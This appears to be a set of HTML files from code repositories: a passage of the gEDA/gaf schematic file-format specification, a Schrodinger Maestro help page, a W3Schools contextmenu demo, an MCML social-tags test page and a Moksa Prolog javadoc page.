filename of the component</td> </tr> </table> <p> The selectable field is either 1 for selectable or 0 if not selectable. </p> <ul> <li class="level1"><div class="li"> The angle field can only take on the following values: 0, 90, 180, 270.</div> </li> <li class="level1"><div class="li"> The angle field can only be positive.</div> </li> <li class="level1"><div class="li"> The mirror flag is 0 if the component is not mirrored (around the Y axis).</div> </li> <li class="level1"><div class="li"> The mirror flag is 1 if the component is mirrored (around the Y axis).</div> </li> <li class="level1"><div class="li"> The just basename is the filename of the component. This filename is not the full path.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">C 18600 19900 1 0 0 7400-1.sym</pre> <p> A component who’s origin is at (18600,19900), is selectable, not rotated, not mirrored, and the basename of the component is 7400-1.sym. </p> </div> <!-- SECTION "component" [21087-22091] --> <h3><a name="path" id="path">path</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> Valid since: Fileformat version 2 (release 1.5.1)<br/> <strong><code>type color width capstyle dashstyle dashlength dashspace filltype fillwidth angle1 pitch1 angle2 pitch2 numlines<br/> path data line 1<br/> path data line 2<br/> path data line 3<br/> &hellip;<br/> path data line N</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>H</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of line</td> </tr> <tr> <td>capstyle</td><td>int</td><td>Line cap style</td> </tr> <tr> <td>dashstyle</td><td>int</td><td>Type of dash style</td> </tr> <tr> <td>dashlength</td><td>int</td><td>Length of dash</td> </tr> <tr> <td>dashspace</td><td>int</td><td>Space inbetween dashes</td> </tr> <tr> <td>filltype</td><td>int</td><td>Type of fill</td> </tr> <tr> <td>fillwidth</td><td>int/mils</td><td>Width of the fill lines</td> </tr> <tr> <td>angle1</td><td>int/degrees</td><td>First angle of fill</td> </tr> <tr> <td>pitch1</td><td>int/mils</td><td>First pitch/spacing of fill</td> </tr> <tr> <td>angle2</td><td>int/degrees</td><td>Second angle of fill</td> </tr> <tr> <td>pitch2</td><td>int/mils</td><td>Second pitch/spacing of fill</td> </tr> <tr> <td>num_lines</td><td>int</td><td>Number of lines of path data (1 based)</td> </tr> <tr> <td>path data line 1 &hellip; N</td><td>path data</td><td>The path data, on seperate lines</td> </tr> </table> <ul> <li class="level1"><div class="li"> The capstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> END NONE = 0</div> </li> <li class="level2"><div class="li"> END SQUARE = 1</div> </li> <li class="level2"><div class="li"> END ROUND = 2</div> </li> </ul> </li> </ul> <ul> <li class="level1"><div class="li"> The dashstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> TYPE SOLID = 0</div> </li> <li class="level2"><div class="li"> TYPE DOTTED = 1</div> </li> <li class="level2"><div class="li"> TYPE DASHED = 2</div> </li> <li class="level2"><div class="li"> TYPE CENTER = 3</div> </li> <li class="level2"><div class="li"> TYPE PHANTOM = 4</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashlength parameter is not used for TYPE SOLID and TYPE DOTTED. This parameter should take on a value of -1 in these cases.</div> </li> <li class="level1"><div class="li"> The dashspace paramater is not used for TYPE SOLID. This parameter should take on a value of -1 in these case.</div> </li> </ul> <ul> <li class="level1"><div class="li"> The filltype parameter is an enumerated type:</div> <ul> <li class="level2"><div class="li"> FILLING HOLLOW = 0</div> </li> <li class="level2"><div class="li"> FILLING FILL = 1</div> </li> <li class="level2"><div class="li"> FILLING MESH = 2</div> </li> <li class="level2"><div class="li"> FILLING HATCH = 3</div> </li> <li class="level2"><div class="li"> FILLING VOID = 4 unused</div> </li> </ul> </li> <li class="level1"><div class="li"> If the filltype is 0 (FILLING HOLLOW), then all the fill parameters should take on a value of -1.</div> </li> <li class="level1"><div class="li"> The fill type FILLING FILL is a solid color fill.</div> </li> <li class="level1"><div class="li"> The two pairs of pitch and spacing control the fill or hatch if the fill type is FILLING MESH.</div> </li> <li class="level1"><div class="li"> Only the first pair of pitch and spacing are used if the fill type is FILLING HATCH.</div> </li> </ul> <ul> <li class="level1"><div class="li"> The format of path data is deliberately similar to that of <a href="http://www.w3.org/TR/SVG/paths.html" class="urlextern" title="http://www.w3.org/TR/SVG/paths.html" rel="nofollow">paths in the W3C SVG standard</a>.</div> </li> <li class="level1"><div class="li"> The subset of the <acronym title="Scalable Vector Graphics">SVG</acronym> path syntax emitted by gEDA is documented below.</div> </li> <li class="level1"><div class="li"> As an implementation detail; libgeda takes code from librsvg, an <acronym title="Scalable Vector Graphics">SVG</acronym> parsing library. As a result, the majority of <acronym title="Scalable Vector Graphics">SVG</acronym> path syntax is read correctly, however this is always normalised to absolute move, line, bezier curve and close-path commands internally (and is saved as such).</div> </li> <li class="level1"><div class="li"> Coordintes along the path are specified in the standard gschem coordinate space.</div> </li> </ul> <p> Example: </p> <pre class="code">H 3 10 0 0 -1 -1 0 -1 -1 -1 -1 -1 5 M 410,240 L 501,200 L 455,295 L 435,265 z</pre> <p> A path starting at (410,240) with lines drawn from there, and joining points (501,200), (455,295), (435,265), closing back to its origin. It has color index 3, is 10 mils thick, no cap, solid style. There are 5 lines of path data. </p> </div> <!-- SECTION "path" [22092-24942] --> <h3><a name="font" id="font">font</a></h3> <div class="level3"> <p> Valid in: Special font files ONLY<br/> <strong><code>type character width flag</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>F</td> </tr> <tr> <td>character</td><td>char</td><td>The character being defined</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of the character (mils)</td> </tr> <tr> <td>flag</td><td>int</td><td>Special space flag</td> </tr> </table> <ul> <li class="level1"><div class="li"> This is a special tag and should ONLY show up in font definition files.</div> </li> <li class="level1"><div class="li"> If the font character being defined is the space character (32) then flag should be 1, otherwise 0.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">F 11 1</pre> <p> The above font definition is for the space character. </p> </div> <!-- SECTION "font" [24943-25464] --> <h2><a name="colors" id="colors">Colors</a></h2> <div class="level2"> <p> In the gEDA/gaf schematic and symbol file format colors are specified via an integer index. The relationship between integer and color is based on object type. Each object type typically has one or more colors. Here is a table of color index to object type: </p> <table class="inline"> <tr> <th>Index</th><th>Object type</th> </tr> <tr> <td>0</td><td>BACKGROUND_COLOR</td> </tr> <tr> <td>1</td><td><acronym title="Personal Identification Number">PIN</acronym>_COLOR</td> </tr> <tr> <td>2</td><td>NET_ENDPOINT_COLOR</td> </tr> <tr> <td>3</td><td>GRAPHIC_COLOR</td> </tr> <tr> <td>4</td><td>NET_COLOR</td> </tr> <tr> <td>5</td><td>ATTRIBUTE_COLOR</td> </tr> <tr> <td>6</td><td>LOGIC_BUBBLE_COLOR</td> </tr> <tr> <td>7</td><td>DOTS_GRID_COLOR</td> </tr> <tr> <td>8</td><td>DETACHED_ATTRIBUTE_COLOR</td> </tr> <tr> <td>9</td><td>TEXT_COLOR</td> </tr> <tr> <td>10</td><td>BUS_COLOR</td> </tr> <tr> <td>11</td><td>SELECT_COLOR</td> </tr> <tr> <td>12</td><td>BOUNDINGBOX_COLOR</td> </tr> <tr> <td>13</td><td>ZOOM_BOX_COLOR</td> </tr> <tr> <td>14</td><td>STROKE_COLOR</td> </tr> <tr> <td>15</td><td>LOCK_COLOR</td> </tr> <tr> <td>16</td><td>OUTPUT_BACKGROUND_COLOR</td> </tr> <tr> <td>17</td><td>FREESTYLE1_COLOR</td> </tr> <tr> <td>18</td><td>FREESTYLE2_COLOR</td> </tr> <tr> <td>19</td><td>FREESTYLE3_COLOR</td> </tr> <tr> <td>20</td><td>FREESTYLE4_COLOR</td> </tr> <tr> <td>21</td><td>JUNCTION_COLOR</td> </tr> <tr> <td>22</td><td>MESH_GRID_MAJOR_COLOR</td> </tr> <tr> <td>23</td><td>MESH_GRID_MINOR_COLOR</td> </tr> </table> <p> The actual color associated with the color index is defined on a per tool bases. Objects are typically assigned their corresponding color index, but it is permissible (sometimes) to assign other color index values to different object types. </p> </div> <!-- SECTION "Colors" [25465-26503] --> <h2><a name="attributes" id="attributes">Attributes</a></h2> <div class="level2"> <p> Attributes are enclosed in braces {} and can only be text. Attributes are text items which take on the form name=value. If it doesn’t have name=value, it’s not an attribute. Attributes are attached to the previous object. Here’s an example: </p> <pre class="code">P 988 500 1300 500 1 { T 1000 570 5 8 1 1 0 pinseq=3 T 1000 550 5 8 1 1 0 pinnumber=3 }</pre> <p> The object is a pin which has an attribute pinnumber=3 and pinseq=3 (name=value). You can have multiple text objects (both the T &hellip; and text string are required) in between the braces {}. As of 20021103, you can only attached text items as attributes. Attaching other object types as attributes is unsupported.<br/> You can also have “toplevel” attributes. These attributes are not attached to any object, but instead are just text objects that take on the form name=value.<br/> These attributes are useful when you need to convey some info about a schematic page or symbol and need the netlister to have access to this info. </p> </div> <!-- SECTION "Attributes" [26504-27491] --> <h2><a name="embedded_components" id="embedded_components">Embedded Components</a></h2> <div class="level2"> <p> Embedded components are components which have all of their definition stored within the schematic file. When a users place a component onto a schematic page, they have the option of making the component embedded. Other than storing all the symbol information inside of the schematic, an embedded component is just any other component. Embedded components are defined as: </p> <pre class="code">C 18600 21500 1 0 0 EMBEDDED555-1.sym [ ... ... Embedded primitive objects ... ]</pre> <p> In the example above, <strong>555-1.sym</strong> is the component. The EMBEDDED tag and the [ ] are the distinguishing characteristics of embedded components. <strong>componentname.sym</strong> must exist in one of the specified component-libraries if you want to unembed the component. </p> </div> <!-- SECTION "Embedded Components" [27492-28256] --> <h2><a name="path_data" id="path_data">Path data</a></h2> <div class="level2"> <p> The gEDA/gaf path data format has been deliberately specified to match a subset of <a href="http://www.w3.org/TR/SVG/paths.html" class="urlextern" title="http://www.w3.org/TR/SVG/paths.html" rel="nofollow">that in the W3C SVG standard.</a>. </p> <ul> <li class="level1"><div class="li"> As an implementation detail; libgeda takes code from librsvg, an <acronym title="Scalable Vector Graphics">SVG</acronym> parsing library. As a result, the majority of <acronym title="Scalable Vector Graphics">SVG</acronym> path syntax is read correctly, however this is always normalised to absolute move, line, bezier curve and close-path commands internally (and is saved as such).</div> </li> <li class="level1"><div class="li"> Coordintes along the path are specified in the standard gschem coordinate space.</div> </li> </ul> <ul> <li class="level1"><div class="li"> Those path commands which gEDA emits, and will gaurantee to parse, are listed in the table below:<br/> </div> </li> </ul> <p> (Text taken from the above <acronym title="Scalable Vector Graphics">SVG</acronym> specification). </p> <ul> <li class="level1"><div class="li"> In the table below, the following notation is used:</div> <ul> <li class="level2"><div class="li"> (): grouping of parameters</div> </li> <li class="level2"><div class="li"> +: 1 or more of the given parameter(s) is required</div> </li> </ul> </li> </ul> <table class="inline"> <tr> <th>Command</th><th>Name</th><th>Parameters</th><th>Description</th> </tr> <tr> <td>M (absolute)</td><td>moveto</td><td>(x,y)+</td><td>Start a new sub-path at the given (x,y) coordinate. M (uppercase) indicates that absolute coordinates will follow; m (lowercase) indicates that relative coordinates will follow. If a relative moveto (m) appears as the first element of the path, then it is treated as a pair of absolute coordinates. If a moveto is followed by multiple pairs of coordinates, the subsequent pairs are treated as implicit lineto commands.</td> </tr> <tr> <td>L (absolute)</td><td>lineto</td><td>(x,y)+</td><td>Draw a line from the current point to the given (x,y) coordinate which becomes the new current point. L (uppercase) indicates that absolute coordinates will follow; l (lowercase) indicates that relative coordinates will follow. A number of coordinates pairs may be specified to draw a polyline. At the end of the command, the new current point is set to the final set of coordinates provided.</td> </tr> <tr> <td>C (absolute)</td><td>curveto</td><td>(x1,y1 x2,y2 x,y)+</td><td>Draws a cubic Bézier curve from the current point to (x,y) using (x1,y1) as the control point at the beginning of the curve and (x2,y2) as the control point at the end of the curve. C (uppercase) indicates that absolute coordinates will follow; c (lowercase) indicates that relative coordinates will follow. Multiple sets of coordinates may be specified to draw a polybézier. At the end of the command, the new current point becomes the final (x,y) coordinate pair used in the polybézier.</td> </tr> <tr> <td>Z or z</td><td>closepath</td><td>(none)</td><td>Close the current subpath by drawing a straight line from the current point to current subpath’s initial point.</td> </tr> </table> <ul> <li class="level1"><div class="li"> gEDA’s output currently emits only the absolute coordinate versions of the above commands.</div> </li> <li class="level1"><div class="li"> gEDA’s output currently emits the commands, M, L, C before every set of coordinates, even where they could be omited according to the <acronym title="Scalable Vector Graphics">SVG</acronym> specification.</div> </li> <li class="level1"><div class="li"> gEDA’s output places commas between x,y coordinates. These may be replaced with whitespace according to the <acronym title="Scalable Vector Graphics">SVG</acronym> specification.</div> </li> <li class="level1"><div class="li"> gEDA’s does not currently support more than one sub-path.</div> </li> <li class="level1"><div class="li"> gEDA currently emits one path data line per command + coordinate set.</div> </li> </ul> <p> As example, lets draw the outline of an AND gate. The path data is: </p> <pre class="code">M 100,100 L 500,100 C 700,100 800,275 800,400 C 800,525 700,700 500,700 L 100,700 z</pre> <p> And a complete schematic: </p> <pre class="code">v 20080706 1 H 3 0 0 0 -1 -1 0 2 20 100 -1 -1 6 M 100,100 L 500,100 C 700,100 800,275 800,400 C 800,525 700,700 500,700 L 100,700 z</pre> <p> The resulting path (with control points drawn on to illustrate their positions) is shown here: </p> <p> <a href="media/geda/path_example_and_gate-smaller.png" class="media" target="_blank" title="geda:path_example_and_gate-smaller.png"><img src="media/geda/path_example_and_gate-smaller.png" class="media" title="" alt="" /></a> </p> </div> <!-- SECTION "Path data" [28257-31685] --> <h2><a name="document_revision_history" id="document_revision_history">Document Revision History</a></h2> <div class="level2"> <table class="inline"> <tr> <td>November 30th, 2002</td><td>Created fleformats.tex from fleformats.html.</td> </tr> <tr> <td>December 1st, 2002</td><td>Continued work on this document.</td> </tr> <tr> <td>October 4th, 2003</td><td>Added new file format version flag info.</td> </tr> <tr> <td>October 19th, 2003</td><td>Added num lines text field.</td> </tr> <tr> <td>November 2nd, 2008</td><td>Added path object, bumping file format version to 2</td> </tr> </table> </div> <!-- SECTION "Document Revision History" [31686-] --></body> </html>
Schrodinger/Schrodinger_2017-1_docs/maestro_workspace_help/add_label_fields.html
platinhom/ManualHom
<!DOCTYPE html> <html xmlns:MadCap="http://www.madcapsoftware.com/Schemas/MadCap.xsd" lang="en-US" xml:lang="en-US" data-mc-search-type="Stem" data-mc-help-system-file-name="Documentation.xml" data-mc-path-to-help-system="../" data-mc-target-type="WebHelp2" data-mc-runtime-file-type="Topic" data-mc-preload-images="false" data-mc-in-preview-mode="false" data-mc-toc-path="Help|Maestro Workspace Help"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link href="../Skins/Default/Stylesheets/Slideshow.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/TextEffects.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/Topic.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/Components/Styles.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Resources/Stylesheets/docs.css" rel="stylesheet" type="text/css" /><title>Add Label Fields Dialog Box</title> <script src="../Resources/Scripts/custom.modernizr.js" type="text/javascript"> </script> <script src="../Resources/Scripts/jquery.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/require.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/require.config.js" type="text/javascript"> </script> <script src="../Resources/Scripts/foundation.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/plugins.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/MadCapAll.js" type="text/javascript"> </script> </head> <body><a name="aanchor5043"></a> <MadCap:concept term="Help Topics" /><a name="aanchor5044"></a> <MadCap:concept term="Maestro" /> <table class="navlink"> <tr> <td class="navlink"><a class="navbutton" href="#features">Features</a> </td> <td class="navlink"><a class="navbutton" href="#links">Links</a> </td> </tr> </table> <h1 class="title">Add Label Fields Dialog Box</h1><a name="summary"></a> <p>In this dialog box you can choose the fields to be added to atom labels.</p> <h2><a name="features"></a>Add Label Fields Dialog Box Features</h2> <ul> <li value="1"><a href="#feature1"><span class="GUI">Atom Properties</span> tab</a> </li> <li value="2"><a href="#feature2"><span class="GUI">Entry Properties</span> tab</a> </li> </ul> <dl> <dt><a name="feature1"></a><span class="GUI">Atom Properties</span> tab</dt> <dd> <p>Select the atom properties that you want to add to the label in this tab. Fields are selected and deselected by clicking on them individually. (The <span class="Keys">Shift</span> and <code>Control</code> keys have no effect.)</p> </dd> <dt><a name="feature2"></a><span class="GUI">Entry Properties</span> tab</dt> <dd> <p>Select the entry properties that you want to add to the label in this tab. The selection uses a standard <a href="../maestro_projects_help/property_selection.html">entry property selector</a> for selection of multiple properties, with filtering and sorting capabilities.</p> </dd> </dl> <h2><a name="links"></a>Related Topics</h2> <ul> <li value="1"><a href="edit_custom_label.html" class="MCXref xref" xrefformat="{paratext}">Edit Custom Label Panel</a> </li> </ul> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryjsref_oncontextmenu_addeventlistener.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_oncontextmenu_addeventlistener.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:19 GMT --> <head> <style> div { background: yellow; border: 1px solid black; padding: 10px; } </style> </head> <body> <p>This example uses the addEventListener() method to attach a "contextmenu" event to a div element.</p> <div id="myDIV" contextmenu="mymenu"> <p>Right-click inside this box to see the context menu! <menu type="context" id="mymenu"> <menuitem label="Refresh" onclick="window.location.reload();" icon="ico_reload.html"></menuitem> <menu label="Share on..."> <menuitem label="Twitter" icon="ico_twitter.png" onclick="window.open('//twitter.com/intent/tweet?text=' + window.location.href);"></menuitem> <menuitem label="Facebook" icon="ico_facebook.png" onclick="window.open('http://facebook.com/sharer/sharer.php?u=' + window.location.href);"></menuitem> </menu> <menuitem label="Email This Page" onclick="window.location='mailto:?body='+window.location.href;"></menuitem> </menu> </div> <p id="demo"></p> <script> document.getElementById("myDIV").addEventListener("contextmenu", myFunction); function myFunction() { var x = document.getElementById("demo"); x.innerHTML = "You right-clicked inside div!"; x.style.fontSize = "30px"; } </script> <p><strong>Note:</strong> The contextmenu <strong>attribute</strong> only works in Firefox!</p> </body> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_oncontextmenu_addeventlistener.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:19 GMT --> </html>
script/kids/3DMapSystemApp/mcml/test/SocialTagsTest.html
NPLPackages/main
<!--script/kids/3DMapSystemApp/mcml/test/SocialTagsTest.html--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>testing social MCML tags by LiXizhi 2008/5/5</title> </head> <body> <!-- Some user ids LiXizhi: e0dba2eb-8495-4b7d-8c3c-cf76d7cc85df ParaEngine: 8ec11316-bc2e-491d-8f18-667501687e69 Andy: 6ea770c6-92b2-4b2b-86da-6f574641ec11 Leio: f114ae44-f5e5-4072-9e40-0d792a9cfe7a Clayman: f5f3de7a-05b2-42a0-bd78-415a939020c2 CYF: ed06733e-986d-4236-8fc8-9f8300456c21 --> <pe:mcml> <script type="text/npl"> <![CDATA[ local pageCtrl = document:GetPageCtrl(); ]]> </script> <pe:tabs name="SocialTagParent" style="margin:5px"> <pe:tab-item text="pe:name测试" selected="true"> <div style="margin:5px"> <div>测试pe:name uid="loggedinuser"结果: <pe:name uid="loggedinuser"/></div> <div>测试pe:name uid="loggedinuser" useyou="false"结果: <pe:name uid="loggedinuser" useyou="false"/></div> <div>测试pe:name uid="loggedinuser" useyou="false" linked="false"结果: <pe:name uid="loggedinuser" useyou="false" linked="false"/></div> <hr /> <div>测试pe:name uid="e0dba2eb-8495-4b7d-8c3c-cf76d7cc85df"结果: <pe:name uid="e0dba2eb-8495-4b7d-8c3c-cf76d7cc85df" useyou="false"/></div> <div>测试pe:name uid="6ea770c6-92b2-4b2b-86da-6f574641ec11"结果: <pe:name uid="6ea770c6-92b2-4b2b-86da-6f574641ec11"/></div> <div>测试pe:name uid="f114ae44-f5e5-4072-9e40-0d792a9cfe7a" linked="false"结果: <pe:name uid="f114ae44-f5e5-4072-9e40-0d792a9cfe7a" useyou="false" linked="false"/></div> <hr /> <div>测试pe:profile-photo uid="loggedinuser"结果: </div> <div>测试pe:profile-photo uid="e0dba2eb-8495-4b7d-8c3c-cf76d7cc85df" linked="true"结果:</div> <div>测试pe:profile-photo uid="f114ae44-f5e5-4072-9e40-0d792a9cfe7a"结果:</div> <div> <div style="float:left;margin:5px"> <pe:profile-photo uid="loggedinuser"/><br /> <pe:name uid="loggedinuser"/> </div> <div style="float:left;margin:5px"> <pe:profile-photo uid="6ea770c6-92b2-4b2b-86da-6f574641ec11" linked="true"/><br /> <pe:name uid="6ea770c6-92b2-4b2b-86da-6f574641ec11"/> </div> <div style="float:left;margin:5px"> <pe:profile-photo uid="f114ae44-f5e5-4072-9e40-0d792a9cfe7a"/><br /> <pe:name uid="f114ae44-f5e5-4072-9e40-0d792a9cfe7a"/> </div> <div style="float:left;margin:5px"> <pe:profile-photo uid="f5f3de7a-05b2-42a0-bd78-415a939020c2"/><br /> <pe:name uid="f5f3de7a-05b2-42a0-bd78-415a939020c2"/> </div> <div style="float:left;margin:5px"> <pe:profile-photo uid="ed06733e-986d-4236-8fc8-9f8300456c21"/><br /> <pe:name uid="ed06733e-986d-4236-8fc8-9f8300456c21"/> </div> </div> <hr /> </div> </pe:tab-item> <pe:tab-item text="测试2"> <div style="margin:5px">其他测试内容</div><hr /> </pe:tab-item> </pe:tabs> </pe:mcml> </body> </html>
doc/api/com/svincent/smalljava/rhino/class-use/LabelTable.html
shawn-vincent/moksa
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN""http://www.w3.org/TR/REC-html40/frameset.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc on Wed Dec 08 17:36:27 EST 1999 --> <TITLE> Moksa Prolog - Java API: Uses of Class com.svincent.smalljava.rhino.LabelTable </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <!-- ========== START OF NAVBAR ========== --> <A NAME="navbar_top"><!-- --></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../com/svincent/smalljava/rhino/LabelTable.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="LabelTable.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> </TR> </TABLE> <!-- =========== END OF NAVBAR =========== --> <HR> <CENTER> <H2> <B>Uses of Class<br>com.svincent.smalljava.rhino.LabelTable</B></H2> </CENTER> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Packages that use <A HREF="../../../../../com/svincent/smalljava/rhino/LabelTable.html">LabelTable</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.svincent.smalljava.rhino"><B>com.svincent.smalljava.rhino</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.svincent.smalljava.rhino"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../../com/svincent/smalljava/rhino/LabelTable.html">LabelTable</A> in <A HREF="../../../../../com/svincent/smalljava/rhino/package-summary.html">com.svincent.smalljava.rhino</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Subclasses of <A HREF="../../../../../com/svincent/smalljava/rhino/LabelTable.html">LabelTable</A> in <A HREF="../../../../../com/svincent/smalljava/rhino/package-summary.html">com.svincent.smalljava.rhino</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../com/svincent/smalljava/rhino/ClassFileWriter.html">ClassFileWriter</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ClassFileWriter A ClassFileWriter is used to write a Java class file.</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ========== START OF NAVBAR ========== --> <A NAME="navbar_bottom"><!-- --></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../com/svincent/smalljava/rhino/LabelTable.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="LabelTable.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> </TR> </TABLE> <!-- =========== END OF NAVBAR =========== --> <HR> <hr><p><em>This is documentation for Moksa Prolog, which can be found at <a href='http://www.svincent.com/moksa/'>http://www.svincent.com/moksa/</a></em></p> <p><em>Copyright &copy; 1999 <a href='http://www.svincent.com/shawn/'>Shawn P. 